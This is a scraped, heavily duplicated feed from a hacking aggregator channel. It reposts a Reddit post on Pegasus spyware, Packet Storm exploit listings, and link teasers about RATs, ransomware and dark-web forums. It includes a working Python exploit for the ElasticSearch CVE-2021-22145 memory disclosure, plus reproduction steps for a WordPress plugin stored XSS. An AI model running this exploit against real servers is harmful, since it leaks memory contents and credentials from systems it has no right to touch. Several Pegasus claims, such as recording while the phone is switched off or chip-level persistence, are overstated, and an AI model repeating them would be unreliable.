hacking: security in practice
Using VPN and popular tips that will not save your phone from Pegasus-like hacking READ ! IMPORTANT
With spyware exploiting active zero-click attacks, it seems sophisticated spying tools like Pegasus are one step ahead of tech giants like Google, Apple, Microsoft and others. Apart from Pegasus, there are other potent spyware like Hornbill and Sunbird which you need to be careful about. So, what can you do when you get to know that your phone has been tracked? It’s highly recommended to not use the same phone when a Pegasus-like spyware has already been detected on it. This is because these spywares are programmed to stay hooked to your device no matter what remedy you apply. Doing the following won’t help you protect your phone from Pegasus-like hacking.
Can antivirus solution protect you against Pegasus-like spywareNo. Anti-virus apps are highly effective to protect your device from adware, malware, etc. But when it comes to Pegasus-like spyware,using an antivirus on an already infected smartphone is of little help because most antivirus and antivirus solutions available for common users are unable to identify Pegasus. While you may feel safe after using an antivirus solution, threats like Pegasus can still be functioning in your phone without your knowledge. Will factory resetting your smartphone help you get rid of Pegasus from your phoneNo. If you decide to hit the ‘Factory Reset’ button to get rid of a spyware like Pegasus then note that it would be no use. Reports highlight that Pegasus has the ability to carry out chip-level attacks making it stay in the phone even after the factory resetting it. Will keeping your phone switch off help avoid Pegasus tracking youNot really. Pegasus has the ability to record audio and use the camera even when the device is switched off as long as it can draw power from the battery. However, it may not be able to relay the data to it’s operators when the device is switched off. So, switching off your phone will not help you much as the moment you turn it on, the spyware will send the recorded data to its handlers. Will using VPN on your smartphone help you protect against PegasusNo. VPN or a virtual private network cannot help your phone from a Pegasus attack. This is because there are multiple delivery modes and you can get the spyware on your phone by simply being in close proximity with a malicious Bluetooth source. Pegasus can be installed even if the victim’s phone number is not known. In case the attacker doesn’t have the victims’ phone number or email ID, the Pegasus agent can be silently injected once the number is acquired using a tactical network element such as Base Transceiver Station (BTS). Will changing getting a new SIM card in the same phone protect against PegasusNo. As long as the device is infected by Pegasus, using a new SIM card on the same device will be of no help as the spyware will start extracting data from it as well. Will turning off mobile data, Wi-Fi helpNo. The speed of transmission of data by Pegasus from your phone may get slow, but it will not stop Pegasus as it has the ability to connect to tactical networking devices at a nearby listening post. Will changing passwords of iCloud or Google account helpNo. Changing passwords and using the same accounts on the infected phone will simply help the attackers get your new password details. Will changing passcode or lock of your phoneNo. Pegasus faces no interference from the passcode, face unlock, pattern or other kind of phone locking features. You may change passcodes as much you like but Pegasus will continue doing its job. Will encrypting your phone help protect your phone from PegasusNot really. Encryption helps when your phone has been taken away from your possession and a t[...]
___________________________
@hacking_Attack
@Hacking_Video
Using VPN and popular tips that will not save your phone from Pegasus-like hacking READ ! IMPORTANT
With spyware exploiting active zero-click attacks, it seems sophisticated spying tools like Pegasus are one step ahead of tech giants like Google, Apple, Microsoft and others. Apart from Pegasus, there are other potent spyware like Hornbill and Sunbird which you need to be careful about. So, what can you do when you get to know that your phone has been tracked? It’s highly recommended to not use the same phone when a Pegasus-like spyware has already been detected on it. This is because these spywares are programmed to stay hooked to your device no matter what remedy you apply. Doing the following won’t help you protect your phone from Pegasus-like hacking.
Can antivirus solution protect you against Pegasus-like spywareNo. Anti-virus apps are highly effective to protect your device from adware, malware, etc. But when it comes to Pegasus-like spyware,using an antivirus on an already infected smartphone is of little help because most antivirus and antivirus solutions available for common users are unable to identify Pegasus. While you may feel safe after using an antivirus solution, threats like Pegasus can still be functioning in your phone without your knowledge. Will factory resetting your smartphone help you get rid of Pegasus from your phoneNo. If you decide to hit the ‘Factory Reset’ button to get rid of a spyware like Pegasus then note that it would be no use. Reports highlight that Pegasus has the ability to carry out chip-level attacks making it stay in the phone even after the factory resetting it. Will keeping your phone switch off help avoid Pegasus tracking youNot really. Pegasus has the ability to record audio and use the camera even when the device is switched off as long as it can draw power from the battery. However, it may not be able to relay the data to it’s operators when the device is switched off. So, switching off your phone will not help you much as the moment you turn it on, the spyware will send the recorded data to its handlers. Will using VPN on your smartphone help you protect against PegasusNo. VPN or a virtual private network cannot help your phone from a Pegasus attack. This is because there are multiple delivery modes and you can get the spyware on your phone by simply being in close proximity with a malicious Bluetooth source. Pegasus can be installed even if the victim’s phone number is not known. In case the attacker doesn’t have the victims’ phone number or email ID, the Pegasus agent can be silently injected once the number is acquired using a tactical network element such as Base Transceiver Station (BTS). Will changing getting a new SIM card in the same phone protect against PegasusNo. As long as the device is infected by Pegasus, using a new SIM card on the same device will be of no help as the spyware will start extracting data from it as well. Will turning off mobile data, Wi-Fi helpNo. The speed of transmission of data by Pegasus from your phone may get slow, but it will not stop Pegasus as it has the ability to connect to tactical networking devices at a nearby listening post. Will changing passwords of iCloud or Google account helpNo. Changing passwords and using the same accounts on the infected phone will simply help the attackers get your new password details. Will changing passcode or lock of your phoneNo. Pegasus faces no interference from the passcode, face unlock, pattern or other kind of phone locking features. You may change passcodes as much you like but Pegasus will continue doing its job. Will encrypting your phone help protect your phone from PegasusNot really. Encryption helps when your phone has been taken away from your possession and a t[...]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Using VPN and popular tips that will not save your phone from...
With spyware exploiting active zero-click attacks, it seems sophisticated spying tools like Pegasus are one step ahead of tech giants like Google,...
Hacking Articles Tips Tricks Videos Tutorials
hacking: security in practice Using VPN and popular tips that will not save your phone from Pegasus-like hacking READ ! IMPORTANT With spyware exploiting active zero-click attacks, it seems sophisticated spying tools like Pegasus are one step ahead of tech…
hird-party is trying to get your data. But in case of Pegasus, it stays in your phone. As the data is already decrypted when you're using the phone, what you can see on your screen, Pegasus can see it as well and then pass it to its operators by taking screenshots secretly.
The only way to get rid of Pegasus from your phone is by destroying the phone, memory card and the SIM card completely. Get a new phone and a new SIM card with a different phone number and change passwords of your accounts.
Also by using this tool you can check if you have been spied in a phone by Israeli Pegasus
The tool, which can be found on GitHub, contains several commands and a series of steps to follow in order to find out if Pegasus has targeted your phone, be it iOS or Android. In this link you can find and download the mobile phone verification toolkit. It is necessary to know the underlying code to run the tests; However, MVT provides options for both operating systems and what it does is run a vulnerability check on your device which will produce indicators to see if you have any indication that the device has been hacked by Pegasus.
What to do if your mobile phone is infected with Pegasus Normal users are usually not a target of powerful spyware like Pegasus, since its main use is to spy on political opponents, but your mobile phone may have ended up getting infected. In this case, the best thing that you can do is to get rid of it from your device.
So if you got here you deserve it enjoy thankssubmitted by /u/We_are7Anonym [link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
The only way to get rid of Pegasus from your phone is by destroying the phone, memory card and the SIM card completely. Get a new phone and a new SIM card with a different phone number and change passwords of your accounts.
Also by using this tool you can check if you have been spied in a phone by Israeli Pegasus
The tool, which can be found on GitHub, contains several commands and a series of steps to follow in order to find out if Pegasus has targeted your phone, be it iOS or Android. In this link you can find and download the mobile phone verification toolkit. It is necessary to know the underlying code to run the tests; However, MVT provides options for both operating systems and what it does is run a vulnerability check on your device which will produce indicators to see if you have any indication that the device has been hacked by Pegasus.
What to do if your mobile phone is infected with Pegasus Normal users are usually not a target of powerful spyware like Pegasus, since its main use is to spy on political opponents, but your mobile phone may have ended up getting infected. In this case, the best thing that you can do is to get rid of it from your device.
So if you got here you deserve it enjoy thankssubmitted by /u/We_are7Anonym [link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Simple Post 1.1 Cross Site Scripting
https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
WordPress Simple Post plugin version 1.1 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Simple Post 1.1 Cross Site Scripting
https://2.bp.blogspot.com/-ulQQD3v8DYI/WWlvnLww_dI/AAAAAAAAIRM/ialO7Idq8vAmWKoyuXUdK7x44tFKJsnBwCLcBGAs/s1600/hack_img4.png
WordPress Simple Post plugin version 1.1 suffers from a persistent cross site scripting vulnerability.
MD5 |
1990fb20d089efa2ee5628a0db9402baDownload
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
# Date: 23/07/2021
# Exploit Author: Vikas Srivastava
# Software Link: https://wordpress.org/plugins/simple-post/
# Version: 1.1
# Category: Web Application
# Tested on Mac
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Simple Post
3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field.
4. Click Update Options.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: ">
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Simple Post 1.1 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Microsoft SharePoint Server 2019 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Microsoft SharePoint Server 2019 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Microsoft SharePoint Server 2019 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ElasticSearch 7.13.3 Memory Disclosure
https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
ElasticSearch version 7.13.3 memory disclosure exploit.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
ElasticSearch 7.13.3 Memory Disclosure
https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
ElasticSearch version 7.13.3 memory disclosure exploit.
MD5 |
128e0970c644272d608d5ebe1bafc7e5Download
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145
#/usr/bin/python3
from argparse import ArgumentParser
import requests
from packaging import version
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("\n################################################################################################")
print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######")
print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######")
print("################################################################################################\n")
parser = ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
args = parser.parse_args()
if not (args.url):
parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')
#Prepare authentication header
authorization_header = ""
if(args.api_key or args.basic):
authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic
#Check elasticsearch version
r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
try:
es_version = json.loads(r.content)["version"]["number"]
except:
print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
print("# Server response: " + str(r.content))
exit()
if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
print("# Elastic Service not vulnerable")
print("# Elastic Service version: " + es_version)
print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3")
exit()
#Prepare exploitation
payload = "@\n"
vulnerable_endpoint = "/_bulk"
url = args.url + vulnerable_endpoint
#Exploitation
print("# ElasticSearch Version: " + es_version)
print("# Request to " + url+"\n")
r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)
#Read Memory Leak and remove stacktrace
print("$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$$$$$ Memory Leaked $$$$$")
print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
response = json.loads(r.content)
leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
print(leak1+"\n"+leak2)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
ElasticSearch 7.13.3 Memory Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Realizations of a Beginner Bug Bounty Hunter
https://medium.com/@p3g4sus/realizations-of-a-beginner-bug-bounty-hunter-49d95d07d387?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@p3g4sus/realizations-of-a-beginner-bug-bounty-hunter-49d95d07d387?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Realizations of a Beginner Bug Bounty Hunter
Hey there , I am Abhishek aka p3g4sus (don’t let the fancy handle deceive you, am the naivest of all the hunters).
Hey there , I am Abhishek aka p3g4sus (don’t let the fancy handle deceive you, am the naivest of all the hunters).Continue reading on Medium » (https://medium.com/@p3g4sus/realizations-of-a-beginner-bug-bounty-hunter-49d95d07d387?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Realizations of a Beginner Bug Bounty Hunter
Hey there , I am Abhishek aka p3g4sus (don’t let the fancy handle deceive you, am the naivest of all the hunters).
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Is hackers use RAT only for illegal activities?
INTRODUCTION:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Is hackers use RAT only for illegal activities?
INTRODUCTION:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Is hackers use RAT only for illegal activities?
INTRODUCTION:
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What is Diffie — Hellman key exchange algorithm? and How it works? — in easy words
https://cdn-images-1.medium.com/max/600/1*rkLEkmWSOhxSTIcSbmRmiA.png
Diffie-Hellman Key Exchange Algorithm or Key agreement algorithm is used to generate the same (symmetric) private cryptographic key at…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What is Diffie — Hellman key exchange algorithm? and How it works? — in easy words
https://cdn-images-1.medium.com/max/600/1*rkLEkmWSOhxSTIcSbmRmiA.png
Diffie-Hellman Key Exchange Algorithm or Key agreement algorithm is used to generate the same (symmetric) private cryptographic key at…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is Diffie — Hellman key exchange algorithm? and How it works? — in easy words
Diffie-Hellman Key Exchange Algorithm or Key agreement algorithm is used to generate the same (symmetric) private cryptographic key at…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Kaseya Received The Universal Decryptor For REvil Ransomware Attack. — CyberWorkx
https://cdn-images-1.medium.com/max/600/0*h__sdCLkyMj6dRYH
Kaseya, the MSP who had faced the zero day attack (CVE-2021–30116) on its VSA product and then escalated into the supply chain attack by…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Kaseya Received The Universal Decryptor For REvil Ransomware Attack. — CyberWorkx
https://cdn-images-1.medium.com/max/600/0*h__sdCLkyMj6dRYH
Kaseya, the MSP who had faced the zero day attack (CVE-2021–30116) on its VSA product and then escalated into the supply chain attack by…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Kaseya Received The Universal Decryptor For REvil Ransomware Attack. — CyberWorkx
Kaseya, the MSP who had faced the zero day attack (CVE-2021–30116) on its VSA product and then escalated into the supply chain attack by…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Deep Web
cafedread.com - An announcement from dread.
https://external-preview.redd.it/VSlBP-bLbsx-Uptzi0eryUFhpm-CZoAuMGPob6ucGjs.jpg?width=640&crop=smart&auto=webp&s=fb0f7647ee368231fbaad1dd4038df9c91628a32 submitted by /u/immabookkryptkeeper
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
cafedread.com - An announcement from dread.
https://external-preview.redd.it/VSlBP-bLbsx-Uptzi0eryUFhpm-CZoAuMGPob6ucGjs.jpg?width=640&crop=smart&auto=webp&s=fb0f7647ee368231fbaad1dd4038df9c91628a32 submitted by /u/immabookkryptkeeper
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
cafedread.com - An announcement from dread.
Posted in r/deepweb by u/immabookkryptkeeper • 1 point and 1 comment
Deep Web
No .onion sites loading
Anyone experienced this problem before? I’ve read some people say it’s due to the clock on the computer but that doesn’t seem to fix it. Normal websites load just not .onion
submitted by /u/TexScot
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
No .onion sites loading
Anyone experienced this problem before? I’ve read some people say it’s due to the clock on the computer but that doesn’t seem to fix it. Normal websites load just not .onion
submitted by /u/TexScot
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
No .onion sites loading
Anyone experienced this problem before? I’ve read some people say it’s due to the clock on the computer but that doesn’t seem to fix it. Normal...
In0ri - Defacement Detection With Deep Learning
http://www.kitploit.com/2021/07/in0ri-defacement-detection-with-deep.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/07/in0ri-defacement-detection-with-deep.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
In0ri - Defacement Detection With Deep Learning